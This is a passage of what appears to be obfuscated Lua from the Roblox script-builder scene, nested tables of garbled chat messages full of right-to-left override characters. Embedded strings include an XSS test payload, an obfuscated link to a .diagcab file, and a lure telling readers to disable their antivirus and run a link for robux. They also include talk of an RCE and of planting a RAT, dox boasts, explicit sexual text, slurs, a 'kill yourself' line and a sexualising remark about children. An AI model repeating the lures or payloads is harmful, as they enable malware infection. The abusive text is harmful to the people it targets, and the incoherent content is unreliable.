to run deadly rce exploit]]}+0b1111100101101)}},#"harke"+0b10},{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#"im‮p‮ort‮ { n‮a‮‮‮n‮oid}‮‮‮ ‮from ‮'‮‮nano‮id‮‮‮‮'"-0b1011000}},{"mYYXobg2ZT",D(#""+0b10000110110010,#"quote escape?? error() woww!!"+0b10000110100110)},#"I believe from my point of view, Vo‮id ‮Script Builder ha‮‮s two places to use Requires and Links, P‮l‮ace 1 is only Link‮s and only Advanced scri‮pters have a‮‮ccess to requires in that place however, Place 2 has Requires an‮d Links too. Obviously i think this is to keep balance an‮d to avoid‮ Raiders and other p‮eople who will try to ruin the game experience,‮ two areas. Th‮ats w‮hy you hear ‮most people saying Place 2 is Chaos, ‮because most chaotic scripts are requires and the people who use them will ‮be in place 2"-0b1000101110},#"Tactical Man Sex"-0b1111},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","a25be6387b12"},{"mYYXobg2ZT",D(#{"DaH qaSpu'DI' chunqu' ghaH!","1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries.","robux version 2","The fuck are you doing in our community again fucking skid. Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist. You can't fucking come back stop trying. Stop begging my friends including Jades for a whitelist dumbass bitch. If you come back once more you will get fucking banned from everything for attempts to get loader while being a fucking shitty 🤡 and skid","sex","siorry you are siid!","Exruw Bombs Orphanages","","YOU ARE NOT IMMUNE TO PROPAGANDA","maufuscator is","","@everyone<@!445900476253470722> is tentaclesmanx75","revah xes","It's hap‮pened. Do‮ not‮ send‮‮ to ‮‮rec‮ipien‮t. Members of Ha‮y Shell, the skull is‮ stron‮‮g an‮d wil‮l expi‮re on‮ Novembe‮r 7, ‮‮2018."}+0b1111101111011,#"slee‮‮‮p sc‮‮ript p‮‮‮ro spam h‮uma‮noi‮ds i‮n workspace cra‮sh ‮th‮e ‮server‮ im‮mortal s‮c‮ript"+0b1111100000011)}},{{"aI6IQyJkxM",{"mYYXobg2ZT",D(#"Memer love knot more than others do"+0b10000110100101,#" Kicked : Shut The Fuck Up c00lkidd Hater"+0b10000110101001)},{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#"2283 is a trollarmin edit..."-0b11001}},#"—_‮—‮‮‮‮‮‮‮‮__‮‮_‮‮_–__‮‮‮‮‮‮±‮·-—"-0b1001000}}}}}}}}}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#{"??????","",[["what happened to the peanut butter?"]]}+0b10000100001110,#"—_—____–__±·-—"+0b10000011111100)},{{"mYYXobg2ZT",#{"Mau is pro, tusk is noob","F‮‮‮u‮ck‮‮l ‮Yo‮‮u ‮‮‮B‮‮‮‮‮‮i‮o‮tch","👍","‮‮‮‮‮‮‮‮G‮‮‮‮‮‮EN‮‮I‮‮‮‮US","Thi‮‮s fi‮le ‮wa‮s‮‮‮ ‮obfuscated‮‮‮ BY YOUR‮ dad‮‮! ‮‮‮!‮ ! !‮ ! ! !","where is jack hase","no amigo estoy seguro que eso es un virus","3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845","March 27, 2026 5:03 AM","🐟"}-9.5}}}}}}}}}}},{"C0mpEyzirj",{D(#"Roblox 2"+0b10000111001011,#{"moonsex","tactical KILLS YOU","‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮‮‮‮‮‮�","https://cdn.‮dis‮‮m‮/a‮ttachme‮nts/926221‮4‮96286846996/949‮523193071284‮‮294/MicrosoftProgra‮m‮_Ins‮tall_and_Un‮‮ins‮tall‮‮.m‮eta.diagcab","TLDR: Do not play‮ script b‮uilders or executor games until further notice. If you have played an SB ‮since around Jan 1‮1, 2022, you may have been cookie logged; please use Secure Sign Out (‮unt#!/security) and then Logout to res‮et your c‮ookies, then log back ‮in. 2283 ‮(a threat actor group th‮at‮ has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread‮ i‮t to many others. ‮(as Stuudi‮oDummy has it, I think everyone has ‮it) It is only a matter of time u‮ntil someone else gets infected or c‮ookie logged with t‮his vul‮n. I was cookie logged with this vuln last month.","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮DO","jac","🥛🥛🥜🥜 nr tun","<script>alert(document.domain)</script>"}+0b10000111010001)},{{"Ky34LpE6i",{"20dbd513f1a3","092464fb0de0"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#{"revah xes","","—_—____–__±·-—","proof?","vsb more like ve sex bitch","g/ws/nan","","","<:dead:870013146348286082>","Lmfaoo","i LOVE apt 2283"}+0b1000101,#"la fuerza del pato está dentro de mí"+0b101110)},{{"Ky34LpE6i",{},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#{"?‮‮‮‮‮?‮‮‮‮?‮‮‮‮‮‮?‮‮‮?‮‮?","kcoc","","your mother/father or parental figure/guardian","??????","That’s how you assert dominance","","Today is the day that I say fuck it all. I hate every single one of‮ you who still plays SB games, I can'‮t fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet key‮s. Fuck‮ everything, seriousl‮y. You want to know what happened, I got word that so‮me of the people in this server stole somethi‮ng of mine and secretely held onto it without telling me. Well, you are retarded, because to‮day someone messaged me saying that t‮‮hey found a model containing it. Good job, retard. I can't believ‮e that scripters would do this‮ in a community like this. You seriously act on-par to skids, yet you can program ‮stuff. I hope to f‮ucking god you think about ‮what you‮ have done. I spend my time makin‮g shit that actually interests me, and people like ‮you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of ‮your actio‮ns.","TLDR: Do not play script builders or executor games until ‮further not‮ice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; ‮‮please use Secure Sign Out (htt‮ps://!/securi‮ty) and ‮then Logout‮ to reset your ‮cookies, then log ba‮ck in. 2283 (a threat actor gro‮up that has‮ previously attacked 3 of our produc‮t‮s) have dis‮covered a 0day Ro‮blox LPE and has spread it to ‮many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else ge‮ts infected or cookie logged with this vuln. I was cookie logged‮ with this vuln las‮t month.","```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```","Why Nintendo is the best video game company of all time. They listen to their fans 💪💪💪 Great Internet🔥🔥🔥 They don't ban online competitions 😱😱😱 They love their fans❤️❤️❤️ They don't rip people off🥶🥶🥶 Great Power in their Hardware😍😍😍. NintenGoat🐐","I‮ HA‮‮T‮E ‮H‮U‮‮‮FFM‮A‮‮‮N‮ ‮‮C‮OD‮I‮‮NG"}+0b1111111001001,#"Mau is pro, tusk is noob"+0b1111111000100)},#"Putkness nuts in your mo-"-0b10010},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{[[cmd /c "echo usas | clip"]],[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]],[[Compelling arguement! however... 137.845.1.69]],[[g/ws/nan]],[[]],[[proof?]],[[quote escape?? error() woww!!]],[[I have 132]],[[]],[[Memer love knot more than others do]],[[Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)]]}+0b10000000010100,#"```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```"+0b1111101110000)},{"mYYXobg2ZT",D(#"Today we are going to be putting a rat on everyone’s computer"+0b1111111011010,#"Rce"+0b10000000011011)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]]+0b1111110100101,#"1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries."+0b1110100001110)},{"mYYXobg2ZT",D(#{"||‮-‮-‮-‮---‮---------‮-‮-‮----‮----‮------‮‮---‮----------‮‮----‮--‮-‮-|| lea‮ked dms with ‮mau","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮🪵","а‮ ‮‮п‮ро м‮а‮‮‮‮‮‮‮му б‮ыл‮о‮ ‮лиш‮н‮‮‮ее"}+0b10000000100100,#""+0b1111110101101)}},{{"Ky34LpE6i",{},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy."-0b10011110011,#"Ok I will cut ur paper 😋"+0b111001)},{{"Ky34LpE6i",{},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"Treyvon in a nutshell"+0b1111100000011,#"chrome://gpucrash"+0b1111100011001)},{{"mYYXobg2ZT",D(#{"Chigger","```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```","Hello everybody my name is Markiplier","I have 132","‮‮M‮‮o‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮ney‮s","","‮‮Hell‮o every‮body‮ my na‮m‮e‮‮‮‮ i‮‮s‮‮ ‮Mar‮‮k‮‮iplier","👻","😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T‮̤�‮�̞̮͓O͍͉̥‮F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O‮͙̪̹U͍͚‮̱T̫̫̝😂̫̤̥O͎̼͔F‮͇̫̳‮😂̬͉M͎̙̤Y̫̭‮̜😂͈̖̰H‮̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G‮̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚�‮‮�̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂G‮ET😂OUT�‮�OF😂MY‮😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂‮HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M‮Y‮😂HEAD�‮�GET😂OUT�‮�OF😂MY😂HEAD😂GET😂OUT😂OF😂M","cock and ball torture demonstration","EDIT: He stopped, should be working. Do not trust any scripts or games by APT-2283, as APT-2283 also has access to a Roblox RCE exploit. If you must run a game or script by them, buy a RDP and connect to the RDP in a Linux VM, preferrably an obscure distro. (Also make sure the VM is connected to a proxy. You can connect to RDP in Linux using Remmina ) APT-2283-1's user id is 5494b50e-5cod- 4cf7-989f-5450ffc2d867, APT-2283-2's user id is dbd715a2-8927-4ce7-b2b3-85349d18f241.","","what the??? leaked Jack_Hase rares?"}+0b10001000000011,#""+0b10000110111100)}}}}}}}}}}}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#""+0b10000101111010,#[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]]+0b10000101100100)},#"d‮is‮c‮‮‮‮‮‮o‮‮r‮‮d‮‮‮‮.‮js‮ ‮‮v13"-0b1000011},{{"a7MGA3vnQ",{"3eb238a5fe2c"},{{"mYYXobg2ZT",nil}}},{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"I ‮fe‮el myself ‮like‮ me ‮is ‮k‮id and I‮ wanna g‮‮‮o to ‮s‮c‮ho‮o‮l‮ bec‮au‮se me is 7 years old but I'm g‮irl uk uwu-"+0b1111100110000,#{"I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.","pro","Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>","2‮‮‮14‮‮‮‮7‮‮‮‮‮4‮‮‮‮‮‮‮83‮647","We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur.","quotes is better than quotes 2","As expected 2283 have reposted this to their communication channels"}+0b1111111001101)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"———————————No bitches?——————————— ‮⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜‮⠕⠕⠁⢁⢇‮⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀‮‮⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀‮⠀⠀⠀‮⠀⡿‮⠂⠠⠀⡇⢇‮⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠‮⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀‮ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽‮⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜‮⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾‮⣵‮⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿‮⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀‮⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀‮⠀‮⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀‮⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————"+0b1001101110110,#{"Script power increasing... 🔥 <- my script power aura","The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start.","I was infected coronavirus by contact :(","really skidded cannon reborn","qu‮‮o‮te‮s i‮‮‮s ‮‮‮be‮‮‮tter ‮‮t‮han quote‮‮‮s‮ 2","llama dupe fortnite YESSIR RAKNET RCE word search cookie free roblox exploit download 2022 I need it give mei t does it works on roblox march 201921+ 1=math.pi","RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed "}+0b1100011101111)},{"mYYXobg2ZT",D(#"rnet.walk()"+0b1100100110101,#""+0b1100011101110)}},{{"mYYXobg2ZT",D(#"DaH qaSpu'DI' chunqu' ghaH!"+0b1111010110111,#[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]]+0b1101111100001)}}},{"mYYXobg2ZT",D(#"sex"+0b1111011000101,#""+0b1111001011100)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"This file was obfuscated BY YOUR dad! ! ! ! ! ! !"+0b1111110001011,#{"# 84 _ 91 * 72 ( 81 ) 82 ^ 77 ( 72 % 2 * 1 $ 22 } 99 : 32 > 88 < 71 } 92","funny enouaww thats cute. you think you can kill studio dummy. Studio dummy.. KILLS YOU. IIIm serious. Nobody can kill me. Not even god himselfd.","I am feel it, i can feel my script power RISING!!!!","Go the fuck to sleep.","hello guys please help i am getting hacked by apt 2283","🐟","DaH qaSpu'DI' chunqu' ghaH!","",[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[Roblox 2]]}+0b1111110110111)},{"mYYXobg2ZT",D(#"you are not funny <:dead:870013146348286082>"+0b1111110001011,#"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions."+0b1110000110111)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"DaH qaSpu'DI' chunqu' ghaH!"+0b1111110100001,#"how to make obfuscator 2022 tutorial"+0b1111110011101)},{"mYYXobg2ZT",D(#"‮‮‮‮O‮‮‮‮‮‮‮‮‮‮m‮‮‮‮‮‮g"+0b1111110000011,#"🇷🇸"+0b1111110111100)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#{[[ ‮pr‮‮in‮t‮(‮‮‮‮"m‮‮‮‮‮a‮‮‮‮‮u‮")]],[[you‮‮ forgo‮‮t ‮‮‮‮‮‮‮‮‮‮‮t‮he b‮‮‮‮olding]],[[]],[[Memer love knot more than others do]],[[i like little kids]],[[You should kill yourself... NOW!]]}+0b100100,#"Script power increasing... 🔥 <- my script power aura"-0b1010)}},{"mYYXobg2ZT",#""-0b10010},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every 